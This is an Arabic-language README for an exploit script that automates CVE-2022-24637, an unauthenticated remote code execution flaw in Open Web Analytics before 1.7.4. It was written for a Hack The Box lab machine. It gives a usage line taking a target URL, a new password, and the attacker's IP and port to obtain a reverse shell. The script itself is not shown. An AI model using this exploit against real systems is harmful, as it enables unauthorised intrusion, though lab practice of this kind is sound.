
RCE غير مصادق عليه في Open Web Analytics الإصدار <1.7.4
ثغرة RCE غير مصادق عليها في Open Web Analytics إصدار <1.7.4
تم إنشاء هذا السكريبت لأتمتة استغلال الثغرة CVE-2022-24637. قمت بإنشاء هذا الاستغلال لجهاز vessel الخاص بي على Hackthebox. https://app.hackthebox.com/machines/Vessel
الاستغلال والفكرة مبنية على https://devel0pment.de/?p=2494
قم بتشغيل السكريبت باستخدام المعاملات التالية:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
قد تحتاج إلى تشغيله عدة مرات للحصول على شيل.
يمكن تحسين السكريبت.
